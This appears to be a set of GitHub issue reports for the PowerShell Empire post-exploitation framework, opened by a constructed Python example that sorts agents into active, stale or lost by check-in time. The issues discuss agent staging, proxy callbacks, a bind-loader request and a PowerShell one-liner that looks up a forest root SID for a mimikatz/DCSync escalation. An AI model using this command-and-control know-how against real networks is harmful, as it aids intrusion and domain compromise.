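Both this request and the earlier enhancement ("clear out agents with a checkin_time older than X") come down to comparing an agent's last check-in with the interval it is supposed to keep. The agent record in the FIPS issue's log carries the inputs: delay, jitter, lost_limit and lastseen_time. The following is an added example in Python, not Empire's own agent bookkeeping: it classifies agents as active, stale or lost, reports the moment an agent first goes quiet (the point at which a notification should fire), and lists agents older than a given age. The meaning assumed for lost_limit (missed check-ins after which the agent itself gives up), the symmetric jitter model and the 30-second grace period are assumptions; the agent records are constructed.

```python
from datetime import datetime, timedelta

TIME_FMT = "%Y-%m-%d %H:%M:%S"      # timestamp format used in the agent.log excerpt
GRACE = timedelta(seconds=30)       # assumption: slack for clock drift and slow HTTP round trips

# Constructed records using the field names from the agent.log excerpt (values are made up).
AGENTS = [
    {"name": "ZTG4SEN2GCWYSZXN", "delay": 5, "jitter": 0.0, "lost_limit": 60,
     "lastseen_time": "2015-08-27 02:19:25"},
    {"name": "AGENT2", "delay": 5, "jitter": 0.0, "lost_limit": 60,
     "lastseen_time": "2015-08-27 02:17:38"},
    {"name": "AGENT3", "delay": 5, "jitter": 0.0, "lost_limit": 60,
     "lastseen_time": "2015-08-27 02:10:00"},
]


def at(text):
    """Parse a timestamp written in the agent.log format."""
    return datetime.strptime(text, TIME_FMT)


def max_interval(agent):
    """Longest sleep the agent may legitimately take between check-ins.
    Assumption: jitter widens the sleep to at most delay * (1 + jitter)."""
    return timedelta(seconds=agent["delay"] * (1.0 + agent["jitter"]))


def missed_checkins(agent, now):
    """How many full check-in windows have elapsed since the agent was last seen."""
    interval = max_interval(agent)
    if interval <= timedelta(0):
        return 0
    return int((now - at(agent["lastseen_time"])) / interval)


def classify(agent, now):
    """'active' inside one window plus grace; 'lost' once more windows than the agent's
    own lost_limit have passed (assumption: it would have exited by then); else 'stale'."""
    silence = now - at(agent["lastseen_time"])
    if silence <= max_interval(agent) + GRACE:
        return "active"
    if missed_checkins(agent, now) > agent["lost_limit"]:
        return "lost"
    return "stale"


def newly_silent(agents, now, previous):
    """Names whose state moved away from 'active' since the previous sweep, i.e. the
    agents to notify about, together with the current state map to keep for next time."""
    current = {a["name"]: classify(a, now) for a in agents}
    changed = sorted(name for name, state in current.items()
                     if state != "active" and previous.get(name, "active") == "active")
    return changed, current


def agents_older_than(agents, now, max_age_seconds):
    """The enhancement request: agents whose last check-in is older than max_age_seconds."""
    limit = timedelta(seconds=max_age_seconds)
    return [a["name"] for a in agents if now - at(a["lastseen_time"]) > limit]


if __name__ == "__main__":
    now = at("2015-08-27 02:19:30")
    for agent in AGENTS:
        print(agent["name"], classify(agent, now), "missed:", missed_checkins(agent, now))
    print("older than 5 min:", agents_older_than(AGENTS, now, 300))
```

A sweep that runs this every few seconds and feeds the returned state map back in as previous yields exactly one notification per agent transition, instead of one per silent poll.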

Path to database invalid

When running the "setup_database.py" according to the website http://www.powershellempire.com/?page_id=110 the path to the empire.db is incorrect.

~/empire# python setup/setup_database.py

 [>] Enter server negotiation password, enter for random generation:
Traceback (most recent call last):
  File "setup/setup_database.py", line 76, in <module>
    conn = sqlite3.connect('../data/empire.db')
sqlite3.OperationalError: unable to open database file
root@python:~/empire#

Unique credentials

I understand keeping around credentials that are the same but retrieved from two different source hosts (kinda), but if all other fields other than the ID and time field are the same it should probably just drop it from the listing so as not to clutter up the output.

Modified "DefaultProfile" doesn't stage correctly

  DefaultProfile    True        /a.asp,/b.asp,/c.asp|Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 7.0; InfoPath.3; .NET CLR 3.1.40767; Trident/6.0; en-US)    Default communication profile for the agent.

Setting results in failed staging (launcher stager still tries to pull index.asp, then index.php and index.jsp)

launcher_vbs.py usage

In the description of the file parameter on line 29, we get:

    'Description' : 'File to output .bat launcher to, otherwise displayed on the screen.',

but I would prefer:

    'Description' : 'File to output .vbs launcher to, otherwise displayed on the screen.',

Agents With Manual Proxy Settings

Hi,

I've been testing this while trying to work through a proxy server.

As a normal user the agent correctly picks up the proxy settings from Internet Explorer and calls back.

When trying to run the agent as System it fails as there are no proxy settings set for the System user. When setting the proxy details manually the stager uses them correctly and sets up the agent; however, the agent does not use the manual proxy settings and is unable to communicate with the server.

Basically I'm left with an agent that never updates and only responds to the 'info' command.

I had a very quick look through the code in agent.ps1 and it looks as if it is never passed the manual proxy settings.

This looks like an awesome tool that will be very useful.

Bind Loader ?

Hello,

Very good project. Thank you :)

Is it possible to generate a Bind Powershell Loader (One-liner) with Empire? (and not a Reverse Loader)

In some cases, a firewall can be between the target and the auditor, with connection initializations from the target to the auditor's machine blocked.

I have not found this Bind feature in your project.

Thank you in advance,

Feature request: get SID for forest root from within Empire?

In this great blog post: http://www.harmj0y.net/blog/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/ is the following quote:


Then we need the SID of the forest root. I’m sure there are better ways to do this, but one easy one is to resolve the ‘krbtgt’ account for the domain:

(New-Object System.Security.Principal.NTAccount("testlab.local","krbtgt")).Translate([System.Security.Principal.SecurityIdentifier]).Value

This method for getting the forest root SID from a child domain requires running the above one-liner powershell command. Is there a way to run this one-liner from inside Empire against one of the agents? Or another option, can this one-liner be incorporated into the existing module situational_awareness/network/powerview/get_forest_domain?

mimikatz certs module exports to where?

It exports the certs, but not sure if it goes to a local directory or where. I can't find them on my attack box and there isn't a way to interface with the file system easily from the agents menu that I can tell in order to find the files on target.

Problem with communication between server and agent

Hi!
I am planning to play around with this cool tool in the Offensive Security Labs.
I started to test this tool yesterday but ran into problems regarding the communication between the server and "client".
I have generated the .bat file stager and launched it on a Windows 7 box.
I already have the server started on my Kali Linux box (no firewall) and I have a listener started as well.

After I run the stager on the Windows 7 box it connects to my listener/server and all looks fine.
The problem is that the only command I can run that works is "info" when I try to interact with the client. Also, I can not see any useful info in the client folder on the server.

(Empire: agents) > interact MWVMCKCYUSSAZBEH
(Empire: MWVMCKCYUSSAZBEH) >
(Empire: MWVMCKCYUSSAZBEH) > info

Every other command I try to run results in no response, no matter how long I wait.
The client status looks fine; it is connected and looks ok as far as I can see.
I have tried to restart the server and run another client session, but the result is the same. I have also turned off the Win 7 firewall in case it was causing any problems, but no difference.

When I tried to troubleshoot the problem I could see this:
-If I run netstat on my Win 7 box I can't see any connection between the client and the server (Kali Linux machine)
-I have started Empire in debug mode and looked at the logs and it looks like the client is asking for status on a regular basis(?), but the client does not respond to any commands/tasks.
It looks like this in the logs:
2015-09-28 11:59:05 HttpHandler : [] /news.asp requested from MWVMCKCYUSSAZBEH at 192.168.31.118
2015-09-28 11:59:11 HttpHandler : [] /login/process.jsp requested from MWVMCKCYUSSAZBEH at 192.168.31.118
2015-09-28 11:59:13 Agents : [] Tasked MWVMCKCYUSSAZBEH to run TASK_SHELL
2015-09-28 11:59:16 HttpHandler : [] /admin/get.php requested from MWVMCKCYUSSAZBEH at 192.168.31.118
2015-09-28 11:59:21 HttpHandler : [] /login/process.jsp requested from MWVMCKCYUSSAZBEH at 192.168.31.118
2015-09-28 11:59:27 HttpHandler : [] /admin/get.php requested from MWVMCKCYUSSAZBEH at 192.168.31.118
2015-09-28 11:59:32 HttpHandler : [] /login/process.jsp requested from MWVMCKCYUSSAZBEH at 192.168.31.118
2015-09-28 11:59:37 HttpHandler : [] /login/process.jsp requested from MWVMCKCYUSSAZBEH at 192.168.31.118

[*] Active agents:

Name              Internal IP     Machine Name  Username            Process          Delay  Last Seen
MWVMCKCYUSSAZBEH  192.168.31.118  OFFSEC-LAB    *offsec-lab\offsec  powershell/2640  5/0.0  2015-09-28 08:24:37

This is the agent info:
[*] Agent info:

ps_version          2
old_uris            None
jitter              0.0
servers             None
internal_ip         192.168.31.118
working_hours       
session_key         4d[}Y<MN$Bv:xIG=LSPH56\)(Tif1`0X
children            None
checkin_time        2015-09-28 07:10:54
hostname            OFFSEC-LAB
delay               5
uris                /admin/get.php,/news.asp,/login/process.jsp
username            offsec-lab\offsec
kill_date           
parent              None
process_name        powershell
listener            http://192.168.30.89:8080/
sessionID           MWVMCKCYUSSAZBEH
process_id          2640
os_details          Microsoft Windows 7 Professional N
lost_limit          60
ID                  1
name                MWVMCKCYUSSAZBEH
external_ip         192.168.31.118
headers             
user_agent          Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
lastseen_time       2015-09-28 08:25:46
high_integrity      1

Do you know what could be the problem?

Running Empire under Mac OS X

Trying to install Empire under MacOSX v10.10.4.
I read the install.sh script to see what the dependencies are and installed what was missing.
When I launch empire I get:
MANDIANT> ../empire
Traceback (most recent call last):
  File "../empire", line 6, in <module>
    from lib.common import empire
  File "/Applications/GITLIST-PACKAGES/Empire/lib/common/empire.py", line 22, in <module>
    import http
  File "/Applications/GITLIST-PACKAGES/Empire/lib/common/http.py", line 18, in <module>
    import encryption
  File "/Applications/GITLIST-PACKAGES/Empire/lib/common/encryption.py", line 12, in <module>
    import base64, hashlib, hmac, string, M2Crypto
  File "build/bdist.macosx-10.10-intel/egg/M2Crypto/__init__.py", line 24, in <module>
  File "build/bdist.macosx-10.10-intel/egg/M2Crypto/ASN1.py", line 12, in <module>
  File "build/bdist.macosx-10.10-intel/egg/M2Crypto/BIO.py", line 221, in <module>
  File "build/bdist.macosx-10.10-intel/egg/M2Crypto/BIO.py", line 227, in CipherStream
AttributeError: 'module' object has no attribute 'PKCS5_SALT_LEN'

I was hoping you could smack me in the head and tell me what stupid thing I've done (other than trying to run it under MacOSX, of course ;-)

Cannot get output from agents (interact)

Using latest commit (671635a) and installed all required dependencies for Ubuntu 14.04 x86_64. Agents connect to listener, but the only command that actually outputs is "info". Tcpdump shows activity when issuing other interactive agent commands but output is never displayed.
